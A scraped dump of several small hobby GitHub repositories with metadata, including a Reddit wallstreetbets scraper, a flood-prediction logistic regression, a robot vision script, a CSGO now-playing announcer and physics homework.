hauteur)\n\n\tpygame.display.update()\n\npygame.quit()" } ]
1
cludlow1/wsbDD
https://github.com/cludlow1/wsbDD
15c3673ecb8d91e85f7db1e601c9c5ff73182416
abf61fb12040b4c09d6fe1d4f230c94f0fd59fdd
6b33ed8ceacda468a668c818bc87104cc11827cf
refs/heads/main
2023-02-22T21:03:31.704547
2021-02-01T02:33:41
2021-02-01T02:33:41
324,068,775
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.6650115847587585, "alphanum_fraction": 0.6732869744300842, "avg_line_length": 38.75, "blob_id": "a0a9a1b957ef952aa0d0929f954e476aeb3c2a58", "content_id": "95d6b35333266c7f2767c540368fcf8af310ef82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3021, "license_type": "no_license", "max_line_length": 150, "num_lines": 76, "path": "/goToReddit.py", "repo_name": "cludlow1/wsbDD", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport praw\nimport requests #Pushshift accesses Reddit via an url so this is needed\nimport json #JSON manipulation\nimport csv #To Convert final table into a csv file to save to your machine\nimport time\nfrom datetime import datetime,timezone,timedelta\nfrom dateutil.relativedelta import relativedelta\n\n#allSubs is a global dictionary for all functions?\nallSubs = {}\n\ndef usingPraw(postID):\n #as of right now im only interested in the score for a given post id\n #pushshift refuses to give me an accurate score but PRAW will\n reddit = praw.Reddit(\"charles\",user_agent = \"charles_user_agent\")\n wsb = reddit.subreddit(\"wallstreetbets\")\n post = reddit.submission(id=postID)\n return post.score\n\ndef oneDayAgo():\n before = int(time.time())\n dt = datetime.now()-relativedelta(days=1)\n after= int(dt.timestamp())\n #returns timestamps in UTC not EST\n return after,before\n\ndef getPushshiftData(after,before):\n #url = 'https://api.pushshift.io/reddit/search/submission/?size=1000&after='+str(after)+'&before='+str(before)+'&subreddit='+str(\"wallstreetbets\")\n url = 'https://api.pushshift.io/reddit/search/submission/?limit=1000&after='+str(after)+'&before='+str(before)+'&subreddit='+str(\"wallstreetbets\")\n r = requests.get(url)\n data = json.loads(r.text)\n return data['data']\n\n#This function will be used to extract the key data points from each JSON result\ndef collectSubData(subm):\n #subData was created at the start to hold all the data which is then added to our global allSubs dictionary.\n subData = list() #list to store data points\n title = subm['title']\n url = subm['url']\n #flairs are not always present so we wrap in try/except\n try:\n flair = subm['link_flair_text']\n except KeyError:\n flair = \"NaN\"\n author = subm['author']\n sub_id = subm['id']\n score = subm['score']\n created = datetime.fromtimestamp(subm['created_utc']) #1520561700.0\n numComms = subm['num_comments']\n permalink = subm['permalink']\n #Put all data points into a tuple and append to subData\n subData.append((sub_id,title,url,author,score,created,numComms,permalink,flair))\n #Create a dictionary entry of current submission data and store all data related to it\n allSubs[sub_id] = subData\n\ndef filterSubs(allSubs,sub):\n subStrToList = list(allSubs[sub][0])\n if subStrToList[8] == 'DD':\n return True\n else:\n return False\n\ndef writeSubsFile():\n with open(\"output.csv\", 'w', newline='', encoding='utf-8') as file:\n a = csv.writer(file, delimiter=',')\n headers = [\"Post ID\",\"Title\",\"Url\",\"Author\",\"Score\",\"Publish Date\",\"Total No. of Comments\",\"Permalink\",\"Flair\"]\n a.writerow(headers)\n for sub in allSubs:\n if filterSubs(allSubs,sub):\n correctScore = usingPraw(str(sub))\n tempList = list(allSubs[sub][0])\n tempList[4] = correctScore\n a.writerow(tuple(tempList))\n else:\n pass\n" }, { "alpha_fraction": 0.6841659545898438, "alphanum_fraction": 0.6926333904266357, "avg_line_length": 30.91891860961914, "blob_id": "68d86ee48ea97f313158d99c6f7caf9db7091a01", "content_id": "22d1d911d7f9ecc1bf6a60ae94d8dd93dd7b7877", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1181, "license_type": "no_license", "max_line_length": 74, "num_lines": 37, "path": "/main.py", "repo_name": "cludlow1/wsbDD", "src_encoding": "UTF-8", "text": "from goToReddit import *\n#from sendMail import *\n\nafter, before = oneDayAgo()\ndata = getPushshiftData(after,before)\n\n#The length of data is the number submissions (data[0], data[1] etc),\n#once it hits zero (after and before vars are the same) end\nsubCount = 0\nprint('where it started: ',after)\nwhile True:#len(data)>0:\n for submission in data:\n collectSubData(submission)\n subCount+=1\n #print(str(datetime.fromtimestamp(data[-1]['created_utc'])))\n #update after variable to last created date of submission\n after = data[-1]['created_utc']\n #data has changed due to the new after variable provided by above code\n try:\n data = getPushshiftData(after, before)\n except json.decoder.JSONDecodeError:\n time.sleep(1)\n continue\n print(subCount)\n if len(data)==0:\n print('what it stopped at: ',after)\n print('after should equal before: ',before)\n print('total number of submissions: ',subCount)\n break\n\nwriteSubsFile()\n\n\n#might be helpful\n#use batch requests to speed up praw.\n#pass it a list of fullnames to reddit.info instance\n#https://github.com/Watchful1/Sketchpad/blob/master/postDownloader.py\n" }, { "alpha_fraction": 0.4545454680919647, "alphanum_fraction": 0.4545454680919647, "avg_line_length": 9, "blob_id": "58717228ccc6261153b32663705cb229de3104a8", "content_id": "593945752e2cd39e8cf98f631da6bd5abd5b6079", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11, "license_type": "no_license", "max_line_length": 9, "num_lines": 1, "path": "/README.md", "repo_name": "cludlow1/wsbDD", "src_encoding": "UTF-8", "text": "\"# wsbDD\" \n" } ]
3
rishabh-vasudevan/vinnovate-task
https://github.com/rishabh-vasudevan/vinnovate-task
451db5bc751f67dd5a7d08a858272e3377c1c572
d6accb6445d91c728279a444de4fea27d7076d25
cfcee8f3518e8df47d61e22aa01fe4a8efc00509
refs/heads/master
2022-11-20T11:19:05.727997
2020-07-24T11:39:38
2020-07-24T11:39:38
282,273,558
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6074073910713196, "alphanum_fraction": 0.642265796661377, "avg_line_length": 30.013513565063477, "blob_id": "1b2f92817689b1c155a2151ffe9dcf25560c9ced", "content_id": "96f1dfe467610bc3843a652c3888a3a4666cdebf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2295, "license_type": "no_license", "max_line_length": 165, "num_lines": 74, "path": "/model.py", "repo_name": "rishabh-vasudevan/vinnovate-task", "src_encoding": "UTF-8", "text": "from sklearn import model_selection\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import preprocessing\nimport pandas as pd\nimport numpy as np\n\ndf = pd.read_excel('Book1.xlsx')\ndf2 = pd.read_excel('Book2.xlsx')\ndata2 = []\nfor i in range(len(df2)):\n data2.append(list(df2.iloc[i]))\ndata_set=[]\nfor i in range(len(df)):\n data_set.append(list(df.iloc[i]))\ndata=[]\nfor i in data_set:\n for j in range(1,13):\n data.append([int(i[0]),df.columns.values[j],i[j],i[13],0])\nfor i in data:\n for j in data2:\n if i[0]==j[0] and i[1]==j[1]:\n i[4]=1\n\nx = pd.DataFrame(data = data)\nx.columns =['Year','Month','Value','Total','Flood']\nlabel = preprocessing.LabelEncoder()\n\n\n# code to get the proccessed value of the months\n# k = x['Month'].unique()\n# k = label.fit_transform(k)\n# print(k) \n# month = label.fit_transform(list(x['Month']))\n\n# x['Month']=month\n# y = x['Flood']\n# x.drop(['Flood','Total'],1,inplace=True)\n# x_train,x_test,y_train,y_test = model_selection.train_test_split(x,y,test_size=0.2)\n# clf=LogisticRegression()\n# clf.fit(x_train,y_train)\n# acc = clf.score(x_test,y_test)\n# print(acc)\n# Year = int(input('Enter the Year: '))\n# Month = input('Enter the Month: ')\n# Rain = int(input('Enter mm of Rain: '))\n\n# Mon = {'JAN':4,'FEB':3,'MAR':7,'APR':0,'MAY':8,'JUN':6,'JUL':5,'AUG':1,'SEP':11,'OCT':10,'NOV':9,'DEC':2}\n# promonth = Mon[Month]\n# arr = [Year,promonth,Rain]\n# print(clf.predict([[Year,promonth,Rain]]))\n# print([[Year,promonth,Rain]])\n\n\n\nmonth = label.fit_transform(list(x['Month']))\n\nx['Month']=month\ny = x['Flood']\nx.drop(['Flood','Month','Year','Total'],1,inplace=True)\nx_train,x_test,y_train,y_test = model_selection.train_test_split(x,y,test_size=0.2)\nclf=LogisticRegression()\nclf.fit(x_train,y_train)\nacc = clf.score(x_test,y_test)\nprint(acc)\nDate = int(input('Enter the Date: '))\nMonth = input('Enter the Month(please enter in caps and only the first three letters of the month)')\nRain = int(input('Enter mm of Rain: '))\nMon = {'JAN':[4,31],'FEB':[3,28],'MAR':[7,31],'APR':[0,30],'MAY':[8,31],'JUN':[6,30],'JUL':[5,31],'AUG':[1,31],'SEP':[11,30],'OCT':[10,31],'NOV':[9,30],'DEC':[2,31]}\n\n#Assuming it will rain constantly for the rest of the month\n\nmonth_rain = (Rain/Date)*Mon[Month][1]\n\nprint(clf.predict([[month_rain]]))\n" } ]
1
GetRobbed/LazyVision2019
https://github.com/GetRobbed/LazyVision2019
df869fe3f657a838f209aacfa91579f595c15b33
2a10d0bd0a114000ecd529a8c257600cb3fa8e95
1a4571b738d0e3ad1036b0c27a3e5b4925dfa8b1
refs/heads/master
2020-04-21T21:27:36.893547
2019-02-09T15:17:59
2019-02-09T15:17:59
169,879,541
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6915636658668518, "alphanum_fraction": 0.7109081149101257, "avg_line_length": 23.486841201782227, "blob_id": "71eb987f4f6379572f47ac03d7151237b87daf37", "content_id": "1655f61d3a281bd3ec67b288b0832b147154b926", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1861, "license_type": "no_license", "max_line_length": 77, "num_lines": 76, "path": "/networkTables.py", "repo_name": "GetRobbed/LazyVision2019", "src_encoding": "UTF-8", "text": "# run with python networkTables.py 10.2.19.2\n#!/usr/bin/env python3\n#\n# This is a NetworkTables client (eg, the DriverStation/coprocessor side).\n# You need to tell it the IP address of the NetworkTables server (the\n# robot or simulator).\n#\n# When running, this will continue incrementing the value 'dsTime', and the\n# value should be visible to other networktables clients and the robot.\n#\n\nimport os\nimport sys\nimport time\nimport threading\nfrom networktables import NetworkTables\n\n# To see messages from networktables, you must setup logging\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\nif len(sys.argv) != 2:\n print(\"Error: specify an IP to connect to!\")\n exit(0)\nip= '10.2.19.2'\n#ip = sys.argv[1]\n\nNetworkTables.initialize(server=ip)\n\ncond = threading.Condition()\nnotified = [False]\n\ndef connectionListener(connected, info):\n print(info, '; Connected=%s' % connected)\n with cond:\n notified[0] = True\n cond.notify()\n\nNetworkTables.initialize(server=ip)\nNetworkTables.addConnectionListener(connectionListener, immediateNotify=True)\n\nwith cond:\n print(\"Waiting\")\n if not notified[0]:\n cond.wait()\n\n# Insert your processing code here\nprint(\"Connected!\")\n\n\nsd = NetworkTables.getTable(\"SmartDashboard\")\n\n\ni = 0\nwhile True:\n os.system(\"/home/pi/robo219.py\")\n #m= os.system(\"/home/pi/LazyVision.py\")\n sd.putNumber(\"slope\", os.system(\"/home/pi/LazyVision.py 1\"))\n #sd.putNumber(\"testinggucci\", 2192192219)\n #sd.putNumber(\"b\", b)\n print(\"robotTime:\", sd.getNumber(\"robotTime\", \"N/A\"))\n\n sd.putNumber(\"dsTime\", i)\n time.sleep(1)\n i += 1\n\n#table = NetworkTables.getTable('SmartDashboard')\n\n# This retrieves a boolean at /SmartDashboard/foo\n#foo = table.getBoolean('foo', True)\n\n#subtable = table.getSubTable('bar')\n\n# This retrieves /SmartDashboard/bar/baz\n#baz = table.getNumber('baz', 1)\n" }, { "alpha_fraction": 0.48685145378112793, "alphanum_fraction": 0.5241649150848389, "avg_line_length": 26.067960739135742, "blob_id": "100aef08d419ded239a5549da7be6288b0bbcf2a", "content_id": "dc07d891ab6d124529f0d0564ae9043acbd965c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2814, "license_type": "no_license", "max_line_length": 168, "num_lines": 103, "path": "/LazyVision.py", "repo_name": "GetRobbed/LazyVision2019", "src_encoding": "UTF-8", "text": "from statistics import mean\nimport PIL\nimport numpy as np\n#import *\nfrom PIL import Image, ImageFilter\n#import robo219\nchangeVal = 250\nIs=np.array([], dtype=np.float64)\nJs=np.array([], dtype=np.float64)\nm=0\nb=0\nedge = 0\nnorm = 255\ntempo = 0\n#fswebcam -r 352x288 --no-banner /home/pi/webcam/currentImage.jpg\nimage = Image.open('/home/pi/webcam/currentImage.jpg').convert('L')\npx = image.load()\n\n#image.save('/home/pi/testing123.jpg')\nwidth, height = image.size\n\nif height > 287:\n cropped = image.crop((0,69,width,height))\n tempo = 69\nelse:\n cropped = image.crop((0,0,width,height))\n tempo = 0\n\ncropped.save('/home/pi/webcam/currentImage.jpg')\n\n\nimgAr = np.array(cropped)\ntemp = np.array(cropped)\ndef wrongWay():\n print(imgAr[0,0])\n for i in range(0,height-tempo):\n for j in range(1,width):\n if(abs((imgAr[i,j]-imgAr[i,j-1]))>changeVal):\n temp[i,j] = edge\n else:\n temp[i,j] = norm\n print('x')\n print (imgAr[i,j])\n print (i,j)\n print (abs((imgAr[i,j]-imgAr[i,j-1])))\n im = Image.fromarray(temp)\n im.save('/home/pi/webcam/gucci.jpg')\ndef maybeWay():\n \n Iso=[]\n Jso=[]\n test = cropped.filter(ImageFilter.FIND_EDGES)\n #test.save('/home/pi/webcam/gucci.jpg')\n temp = np.array(test)\n for i in range(0,height-tempo):\n for j in range(1,width):\n if (temp[i,j]<40):\n temp[i,j] = 0\n else:\n temp[i,j] = 255\n #\n for x in range(0,width):\n temp[0,x] = 0\n temp[1,x] = 0\n #\n for i in range(1,height-tempo-1):\n for j in range(1,width-1):\n if(temp[i,j]>0):\n if(temp[i+1,j] > 0 or temp[i-1,j] > 0 or temp[i,j+1]> 0 or temp[i,j-1]> 0 or temp[i+1,j+1]> 0 or temp[i-1,j-1] or temp[i+1,j-1]> 0 or temp[i-1,j+1]> 0):\n temp[i,j] = 255\n Iso.append(i)\n Jso.append(j)\n else:\n temp[i,j] = 0\n #\n for x in range(0,width - tempo):\n temp[0,x] = 0\n temp[1,x] = 0\n #\n Is = np.asarray(Iso, dtype=np.float64)\n Js = np.asarray(Jso, dtype=np.float64)\n m= (mean(Is)*mean(Js)-mean(Js*Is))/((mean(Is)*mean(Is))-mean(Is*Is))\n b= mean(Js)-m*mean(Is)\n #\n print(m)\n print(b)\n for j in range(0,height-tempo):\n guccigang = int(m*j+b)\n if(abs(guccigang)<352):\n temp[j,guccigang]=255\n else:\n print(\"Hello World\")\n #for y in range(0,height):\n # temp[int((y-b)/m),y] = 255\n test = Image.fromarray(temp)\n test.save('/home/pi/webcam/gucci.jpg')\n #for j in range(1,width):\n # temp[m*j+b,j]\n return m\nmaybeWay()\nreturn maybeWay()\n\n#print(imgAr)\n \n \n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7435897588729858, "avg_line_length": 25, "blob_id": "ca660cc53fb2a9a7b97ddafa1dd32554141e062e", "content_id": "3b4057b4f9b30c04d2f1b0bee66bf8792d8c6f97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 78, "license_type": "no_license", "max_line_length": 64, "num_lines": 3, "path": "/robo219.py", "repo_name": "GetRobbed/LazyVision2019", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nfswebcam -r 300x300 --no-banner /home/pi/webcam/currentImage.jpg\n" } ]
3
Jereck/Character
https://github.com/Jereck/Character
b1d545bebf2b523273f330cbde1979e8bc72bf06
e1152f3c08c9dcfc970f2b04808827e57b64d122
1e64ba17b41aff64be809902a1b9363a97b759fc
refs/heads/master
2021-01-01T19:52:40.124581
2017-07-29T03:32:43
2017-07-29T03:32:43
98,705,747
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.640326976776123, "alphanum_fraction": 0.6948229074478149, "avg_line_length": 20.647058486938477, "blob_id": "8cd1f70a5c16f87a7cde4208651de9ccd1960869", "content_id": "8162f3277c5e7109789bfd997f6bf104fc8af732", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 367, "license_type": "no_license", "max_line_length": 37, "num_lines": 17, "path": "/sheet.py", "repo_name": "Jereck/Character", "src_encoding": "UTF-8", "text": "class Character:\n\tdef __init__(self, h, m):\n\t\tself.health = h\n\t\tself.mana = m\n\t\tprint(\"Character Created!\")\n\n\tdef take_damage(self, power, speed):\n\t\tself.damage = power * speed\n\nwarrior = Character(100, 50)\nmage = Character(50, 100)\nrogue = Character(75, 75)\npaladin = Character(80, 70)\n\nprint(warrior.take_damage)\nwarrior.take_damage(5, 8)\nprint(warrior.take_damage)" } ]
1
harrego/csgocat
https://github.com/harrego/csgocat
0cef7b6ae29c89e2405df02774dd0b122386008f
a64fb0eef685b32467dd33421201f4212a44967c
ddddb5f63efab3582b473070cab9154af60f92f5
refs/heads/master
2022-11-29T07:58:47.424098
2020-08-11T21:28:40
2020-08-11T21:28:40
286,847,118
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7571528553962708, "alphanum_fraction": 0.7620376944541931, "avg_line_length": 58.75, "blob_id": "f3c15f99ec49b9622374b63cb316ae8583acb77f", "content_id": "80b576d08175abbf0a3d6c14f98be775cb41c8ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1433, "license_type": "no_license", "max_line_length": 441, "num_lines": 24, "path": "/README.md", "repo_name": "harrego/csgocat", "src_encoding": "UTF-8", "text": "# csgocat\n\nKeep your CSGO team informed what's playing \n\n## Contributions\n\nThanks to [chxrlt](https://github.com/chxrlt) for writing all of the `mpris` and `xdotool` code!\n\n## Usage\n\n1) Install Linux, I recommend Ubuntu\n2) Install `xdotool`, `sudo apt install xdotool` on Ubuntu, `sudo pacman -S xdotool` on Arch\n3) Change `USER_JUKEBOX` in `main.py` to either `Jukebox.Rhytmbox` or `Jukebox.Spotify`\n4) Enable the console in CSGO and get into a game\n5) Run `main.py` and quickly tab back into your game, it will give you a 5 second head start\n6) When a song is about to change, stand still and let it type into your game\n\n## How it works\n\nIt uses `mpris` to determine the current song playing in either Rhythmbox or Spotify, a hash of the title and the artist is stored in `/tmp/songhash` and every second the current song is polled and compared against the cached hash. If the song has changed then `xdotool` will open the CSGO console and type `say Now playing: TITLE by ARTIST`. Before a song changes make sure you are standing still or you may type bad input into the console!\n\n## Disclaimer\n\nCSGO is a multiplayer video game with an anti-cheat. Like all applications that interact with the game it may lead to a \"cheat detection\" and get you banned. This IS NOT a cheat but it is always unknown what will trigger anti-cheat. Run this tool AT YOUR OWN RISK and I am not responsible for any action as a result of using this tool." }, { "alpha_fraction": 0.6313868761062622, "alphanum_fraction": 0.6358475089073181, "avg_line_length": 25.516128540039062, "blob_id": "9bde715648c300030eb07d43ed1093948351dd02", "content_id": "fb60b2c58ee333ced9cb454ad83ce8747f865a65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2466, "license_type": "no_license", "max_line_length": 82, "num_lines": 93, "path": "/main.py", "repo_name": "harrego/csgocat", "src_encoding": "UTF-8", "text": "import dbus\nimport time\nimport sys\nimport os\nimport subprocess\nimport hashlib\nimport argparse\nfrom dataclasses import dataclass\nfrom enum import Enum\n\n# MARK: csgo related\n\ndef xdostring(s):\n for c in s:\n if c == \" \":\n subprocess.call([\"xdotool\", \"key\", \"space\"])\n elif c == \":\":\n subprocess.call([\"xdotool\", \"key\", \"colon\"])\n else:\n subprocess.call([\"xdotool\", \"key\", c])\n\ndef csgo_say(msg):\n subprocess.call([\"xdotool\", \"key\", \"grave\"])\n xdostring(\"say \" + msg)\n subprocess.call([\"xdotool\", \"key\", \"Return\"])\n subprocess.call([\"xdotool\", \"key\", \"grave\"])\n\ndef multiline_csgo_say(msgs):\n for msg in msgs:\n csgo_say(msg)\n time.sleep(0.5)\n\n# MARK: song related\n\nclass Jukebox(Enum):\n Spotify = \"org.mpris.MediaPlayer2.spotify\"\n Rhythmbox = \"org.mpris.MediaPlayer2.rhythmbox\"\n\nclass Song:\n def __init__(self, title, artist):\n self.title = title\n self.artist = artist\n\n def hash(self):\n song_str = f\"{self.title}/{self.artist}\".encode(\"utf-8\")\n hash_str = hashlib.sha1(song_str).hexdigest()\n return hash_str\n\n def formatted(self, jukebox):\n jukebox_str = \"\"\n if jukebox is not None:\n jukebox_str = f\" on {jukebox.name}\"\n return f\"{self.title} by {self.artist}{jukebox_str}\"\n\nSONGHASH_DIR = \"/tmp/songhash\"\nUSER_JUKEBOX = Jukebox.Spotify\n\ndef current_song(jukebox):\n session_bus = dbus.SessionBus()\n spotify_bus = session_bus.get_object(jukebox.value, \"/org/mpris/MediaPlayer2\")\n\n spotify_props = dbus.Interface(spotify_bus, \"org.freedesktop.DBus.Properties\")\n metadata = spotify_props.Get(\"org.mpris.MediaPlayer2.Player\", \"Metadata\")\n\n return Song(metadata[\"xesam:title\"], metadata[\"xesam:artist\"][0])\n\ndef write_hash_cache(hash_str):\n with open(SONGHASH_DIR, \"w\") as name_file:\n name_file.write(hash_str)\n\ndef read_hash_cache():\n if not os.path.isfile(SONGHASH_DIR):\n return True\n with open(SONGHASH_DIR, \"r\") as hash_file:\n read_hash = hash_file.read()\n return read_hash\n\ndef song_check(song):\n new_song_hash = song.hash()\n if read_hash_cache() != new_song_hash:\n write_hash_cache(new_song_hash)\n return True\n else:\n return False\n\n# MARK: main loop\n\ntime.sleep(5)\nwhile True:\n now_playing = current_song(USER_JUKEBOX)\n if song_check(now_playing):\n csgo_say(f\"Now playing: {now_playing.formatted(USER_JUKEBOX)}\")\n time.sleep(1)\n" } ]
2
jocelyneterrazas/ChickenDinner
https://github.com/jocelyneterrazas/ChickenDinner
b39d596f1502417894e55eb93c354a083ba304c9
0df33d4957130dd0cf168fa558f26f4b568f91be
799a572e8e181f28e1114afcc66920cc60ae6166
refs/heads/master
2020-03-21T16:49:18.000734
2018-06-26T21:31:05
2018-06-26T21:31:05
138,795,341
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5800830125808716, "alphanum_fraction": 0.6082987785339355, "avg_line_length": 29.605262756347656, "blob_id": "a4e36154579922a0b3ae2054b52fd8edf6e37154", "content_id": "b06783561bd8cecd73eabc25e0a795fba968122f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1205, "license_type": "no_license", "max_line_length": 64, "num_lines": 38, "path": "/neuralNetwork.py", "repo_name": "jocelyneterrazas/ChickenDinner", "src_encoding": "UTF-8", "text": "\r\n\r\ndef evaluateNeuralNetwork(input1, weights):\r\n result = 0\r\n for i in range(len(input1)):\r\n hi = input1[i] * weights[i]\r\n #print(weights[i])\r\n result+=(hi)\r\n return round(result, 3)\r\n\r\ndef evaluateNeuralError(desired, actual):\r\n return round(desired - actual,3)\r\n\r\ndef learningFunc(input1, weights, learningRate):\r\n for i in range(len(input1)):\r\n if input1[i] > 0:\r\n weights[i]+= learningRate\r\n round(weights[i], 3)\r\n\r\ndef training(trials, input1, weights, learningRate):\r\n for i in range(trials):\r\n neuralNetResult = evaluateNeuralNetwork(input1, weights)\r\n learningFunc(input1, weights, learningRate)\r\n err = evaluateNeuralError(1, neuralNetResult)\r\n print(\"Error: \", err, \"Result: \", neuralNetResult)\r\n round(weights[2], 3)\r\n print(weights)\r\n return neuralNetResult\r\n \r\n\r\nif __name__==\"__main__\":\r\n input1 = [0,0,1,0]\r\n weights = [0,0,0,0]\r\n desiredResult = 1\r\n learningRate = 0.20\r\n trials = 6\r\n result = training(trials, input1, weights, learningRate)\r\n if (result >=1):\r\n print(\"WINNER WINNER, CHICKEN DINNER\")\r\n #evaluateNeuralNetwork(input1, weights)\r\n" } ]
1
jxw666/computationalphysics_N2015301020090
https://github.com/jxw666/computationalphysics_N2015301020090
98c906b7d7dbbf240e4c19545d8c59aa48504b60
c3ca4fd8318b4681401ea3c91111319d103e65fd
9a791ad44b3097dccba973c40b3547f25ffa3837
refs/heads/master
2021-05-15T00:29:41.950601
2018-03-09T11:46:20
2018-03-09T11:46:20
103,151,213
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5700934529304504, "alphanum_fraction": 0.6181575655937195, "avg_line_length": 32.04411697387695, "blob_id": "734ebb097abe391be7180f919d761f9ba63ba683", "content_id": "6cbb366a679d7c0bb118ca503ce44ba19c2b56f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2305, "license_type": "no_license", "max_line_length": 83, "num_lines": 68, "path": "/CH5/ch5.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\n#1.initialize-V\ndelta=0.1\nV_old=[[0.]*(int(1+1/delta))for i in range(int(1+1/delta))]\nfor i in range(1+int(round(0.3/delta))):#int(0.3/0.1)=2\n V_old[int(round(0.3/delta))][i]=-1#借鉴上官俊怡学姐的代码,设置初值\ndeltaV=100\n#2.update-V\nwhile deltaV >=len(V_old)**2*10**(-5):\n V_new=[[0.]*len(V_old)for i in range(len(V_old))]\n for i in range(1,len(V_old)-1):\n for j in range(1,len(V_old)-1):\n V_new[i][j]=(V_old[i-1][j]+V_old[i+1][j]+V_old[i][j-1]+V_old[i][j+1])/4\n for j in range(1,len(V_old)-1):\n V_new[0][j]=(V_old[0][j-1]+V_old[0][j+1])/4\n for k in range(1,len(V_old)-1):\n V_new[k][0]=(V_old[k-1][0]+V_old[k+1][0]+2*V_old[k][1])/4\n V_new[0][0]=V_old[0][1]/2\n for l in range(1+int(round(0.3/delta))):\n V_new[int(round(0.3/delta))][l]=-1.\n b=[]\n for i in range(len(V_old)):\n a=[abs(V_old[i][j]-V_new[i][j]) for j in range(len(V_old))]\n b.append(max(a))\n deltaV=max(b)\n V_old=V_new\nN=len(V_old)#这里也借鉴了上官俊怡的代码\nV1=np.transpose(V_old)#1st Quadrant\nV3=[[0.]*(N-1) for i in range(N)]#3rd quadrant\nfor i in range(N):\n for j in range(N-1):\n V3[i][j]=-V1[N-1-i][N-1-j]\n#add the 4th qudrant to V3 using extend\nfor i in range(N):\n V3[i].extend(V1[N-1-i])\n#add the 1st&2nd qudrant using +\nV_whole=V3\nfor i in range(N-1):\n V_whole=V_whole+[V3[N-2-i]]\ndel V1,V3 \n \nx=np.linspace(-1,1,len(V_whole))\nX,Y= np.meshgrid(x,x)\nfig = plt.figure()\n\n\n#ax = Axes3D(fig)\n#ax.set_xlabel('x')\n#ax.set_ylabel('y')\n#ax.set_zlabel('Electric Potential/V')\n#ax.set_title('Electric Potential Distribution Near Two Metal Plates') \n#surf=ax.plot_surface(X,Y,V_whole, rstride=1, cstride=1, cmap=cm.viridis)\n#fig.colorbar(surf, shrink=0.5, aspect=5)\n#wframe = ax.plot_wireframe(X, Y, V_whole, rstride=2, cstride=2)\n#CS = plt.contour(X, Y, V_whole, 15, linewidths=0.5, colors='k')\n#CS = plt.contourf(X, Y, V_whole, 15)\nplt.xlabel('x')\nplt.ylabel('y')\n#plt.title('Electric Potential Distribution Near Two Metal Plates')\n#plt.colorbar() # draw colorbar\nEY,EX=np.gradient(V_whole)\nEX,EY=-EX,-EY\nplt.quiver(X,Y, EX, EY)\nplt.title('Electric field near two metal plates')\nplt.show()\n" }, { "alpha_fraction": 0.6306939125061035, "alphanum_fraction": 0.6939390301704407, "avg_line_length": 68.27825927734375, "blob_id": "a328fa6e59fc96793afcd1618caffaf2736cfcf6", "content_id": "20b140abe0eefcfefb9ddac4cb729833c9901ec0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7991, "license_type": "no_license", "max_line_length": 336, "num_lines": 115, "path": "/ch2.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "\n\n\n> Written with [StackEdit](https://stackedit.io/).\n# Chapter_two_section2.2\nproblem2.7&8\n\n贾雪巍 2015301020090\n\n----------\n\n\n## The Trajectory of a Cannon Shell\n------------------------------------\nConsider a projectile such as a shell shot by a cannon.If we ignore air resistance,the equation of motions can be obtained from Newton's second law.\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$&space;\\frac{d^2x}{dt^2}=0$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$&space;\\frac{d^2x}{dt^2}=0$$\" title=\"$$ \\frac{d^2x}{dt^2}=0$$\" /></a>\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\frac{d^2y}{dt^2}=-g$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\frac{d^2y}{dt^2}=-g$$\" title=\"$$\\frac{d^2y}{dt^2}=-g$$\" /></a>\nx and y are horizontal and vertical coordinates of the projectile.\nThese are second-order differential equations.If we recasting the equations in the following way.\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\frac{dx}{dt}=v_x$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\frac{dx}{dt}=v_x$$\" title=\"$$\\frac{dx}{dt}=v_x$$\" /></a>\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\frac{dv_x}{dt}=0$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\frac{dv_x}{dt}=0$$\" title=\"$$\\frac{dv_x}{dt}=0$$\" /></a>\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\frac{dy}{dt}=v_y$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\frac{dy}{dt}=v_y$$\" title=\"$$\\frac{dy}{dt}=v_y$$\" /></a>\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\frac{dv_y}{dt}=-g$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\frac{dv_y}{dt}=-g$$\" 